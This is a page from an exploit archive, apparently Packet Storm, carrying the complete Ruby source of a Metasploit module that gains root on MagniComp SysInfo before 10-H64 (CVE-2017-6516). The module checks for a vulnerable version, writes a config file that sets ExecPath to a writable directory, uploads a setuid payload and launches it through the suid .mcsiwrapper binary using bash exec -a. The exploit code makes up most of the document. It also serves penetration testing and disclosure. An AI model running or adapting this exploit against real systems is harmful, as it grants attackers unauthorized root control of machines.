Twenty Year Anniversary

MagniComp SysInfo mcsiwrapper Privilege Escalation

MagniComp SysInfo mcsiwrapper Privilege Escalation
Posted Feb 20, 2018
Authored by Brendan Coles, Daniel Lawson, Romain Trouve | Site metasploit.com

This Metasploit module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64. The .mcsiwrapper suid executable allows loading a config file using the '--configfile' argument. The 'ExecPath' config directive is used to set the executable load path. This Metasploit module abuses this functionality to set the load path resulting in execution of arbitrary code as root. This Metasploit module has been tested successfully with SysInfo version 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.

tags | exploit, arbitrary, x86, root
systems | linux, solaris, debian, fedora
advisories | CVE-2017-6516
MD5 | 8b66a6c82ba59a4ce479a1d17b9e36b6

MagniComp SysInfo mcsiwrapper Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'MagniComp SysInfo mcsiwrapper Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on systems running
MagniComp SysInfo versions prior to 10-H64.

The .mcsiwrapper suid executable allows loading a config file using the
'--configfile' argument. The 'ExecPath' config directive is used to set
the executable load path. This module abuses this functionality to set
the load path resulting in execution of arbitrary code as root.

This module has been tested successfully with SysInfo version
10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on
Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Lawson', # Discovery and exploit
'Romain Trouve', # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Sep 23 2016',
'Platform' => %w(linux solaris),
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Solaris', { 'Platform' => 'solaris', 'Arch' => ARCH_X86 } ],
[ 'Linux', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ]} ]
],
'References' =>
[
[ 'CVE', '2017-6516' ],
[ 'BID', '96934' ],
[ 'URL', 'http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml' ],
[ 'URL', 'https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/' ],
[ 'URL', 'https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/' ]
]
))
register_options(
[
OptString.new('SYSINFO_DIR', [ true, 'Path to SysInfo directory', '/opt/sysinfo' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end

def sysinfo_dir
datastore['SYSINFO_DIR']
end

def check
unless cmd_exec("test -d #{sysinfo_dir} && echo true").include? 'true'
vprint_good "Directory '#{sysinfo_dir}' does not exist"
return CheckCode::Safe
end
vprint_good "Directory '#{sysinfo_dir}' exists"

mcsiwrapper_path = "#{sysinfo_dir}/bin/.mcsiwrapper"
unless setuid? mcsiwrapper_path
vprint_error "#{mcsiwrapper_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{mcsiwrapper_path} is setuid"

bash_path = cmd_exec 'which bash'
unless bash_path.start_with?('/') && bash_path.include?('bash')
vprint_error 'bash is not installed. Exploitation will fail.'
return CheckCode::Safe
end
vprint_good 'bash is installed'

config_version = cmd_exec "grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg"
version = config_version.scan(/^ProdVersion=(\d+-H\d+|\d+-GA)$/).flatten.first
if version.blank?
vprint_error 'Could not determine the SysInfo version'
return CheckCode::Detected
end
if Gem::Version.new(version.sub('-H', '.')) >= Gem::Version.new('10.64')
vprint_error "SysInfo version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "SysInfo version #{version} is vulnerable"

CheckCode::Vulnerable
end

def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end

def mkdir(path)
vprint_status "Creating '#{path}' directory"
cmd_exec "mkdir -p #{path}"
register_dir_for_cleanup path
end

def exploit
check_status = check
if check_status != CheckCode::Vulnerable && check_status != CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end

# Set target
uname = cmd_exec 'uname'
vprint_status "Operating system is #{uname}"
if target.name.eql? 'Automatic'
case uname
when /SunOS/i
my_target = targets[1]
when /Linux/i
my_target = targets[2]
else
fail_with Failure::NoTarget, 'Unable to automatically select a target'
end
else
my_target = target
end
print_status "Using target: #{my_target.name}"

# Check payload
if (my_target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
(my_target['Platform'].eql?('solaris') && payload_instance.name !~ /solaris/i)
fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{my_target.name}'"
end

# Create a working directory
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric rand(5..10)}"
mkdir base_path

# Write config file
config_path = "#{base_path}/#{rand_text_alphanumeric rand(5..10)}"
upload config_path, "ExecPath=#{base_path}"

# Upload payload
payload_name = rand_text_alphanumeric rand(5..10)
payload_path = "#{base_path}/#{payload_name}"
upload payload_path, generate_payload_exe
cmd_exec "chmod u+sx '#{payload_path}'"

print_status 'Executing payload...'

# Executing .mcsiwrapper directly errors:
# Command ".mcsiwrapper" cannot start with `.' or contain `/'.
# Instead, we execute with bash to replace ARGV[0] with the payload file name
output = cmd_exec "bash -c \"exec -a #{payload_name} #{sysinfo_dir}/bin/.mcsiwrapper --configfile #{config_path}&\""
output.each_line { |line| vprint_status line.chomp }
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    7 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close